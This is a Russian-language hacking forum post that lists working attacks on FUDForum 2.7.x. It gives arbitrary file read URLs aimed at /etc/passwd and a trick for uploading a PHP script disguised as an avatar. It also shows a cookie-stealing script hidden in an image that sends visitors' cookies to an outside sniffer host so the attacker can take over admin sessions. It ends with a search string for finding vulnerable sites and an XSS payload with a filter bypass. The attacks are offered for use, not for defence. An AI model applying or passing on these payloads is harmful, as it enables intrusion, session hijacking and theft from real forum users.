[Обзор] Уязвимости FUDForum
Офф. Сайт [URL="http://www.fudforum.org/forum/"]www.fudforum.org[/URL]
Актуальная версия[/COLOR] 2.7.7
Исходники[/COLOR] [URL="http://sourceforge.net/projects/fudforum/files/"]Скачать[/URL] [CENTER][COLOR="Green"]Уязвимость в admbrowse.php[/COLOR][/CENTER]
Уязвимость в admbrowse.php позволяет просматривать произвольные файлы
Code
admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
[CENTER][COLOR="Green"]FUD Forum 2.7.1 PHP code injection vurnelability[/COLOR][/CENTER]
Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом.
Под linux/unix
Code
cat foo.png foo.php > upload_me.php
В win в простом Notepad.
[CENTER][COLOR="#008000"]Уязвимость в tmp_view.php[/COLOR][/CENTER]
Уязвимость позволяет просматривать произвольные файлы.
Code
/tmp_view.php?file=/etc/passwd
[CENTER][COLOR="Green"]Кража cookie[/COLOR][/CENTER]
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим:
Code
<html>
<head>
<script>img = new Image(); img.src = "http://веб-снифер.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
После вставки в сообщение будет ссылка наподобии этой:
Code
http://forum.site.ru/index.php?t=getfile&id=2723&private=0
или так нагляднее:
Code
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей.
******
Далее идем сюда:
Code
http://веб-снифер.ru/sniff/log.php
И вставляем куки себе. И получаем права аминистратора.
Для поиска:
Code
Powered by: FUDforum 2.7.4
[CENTER][COLOR="Green"]XSS[/COLOR][/CENTER]
На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения:
Code
[img=javascript:alert('bugs!');]Бага[/img]
В слове javascript букву t нужно заменить на код & # 116 ; без пробелов.
©Solide Snake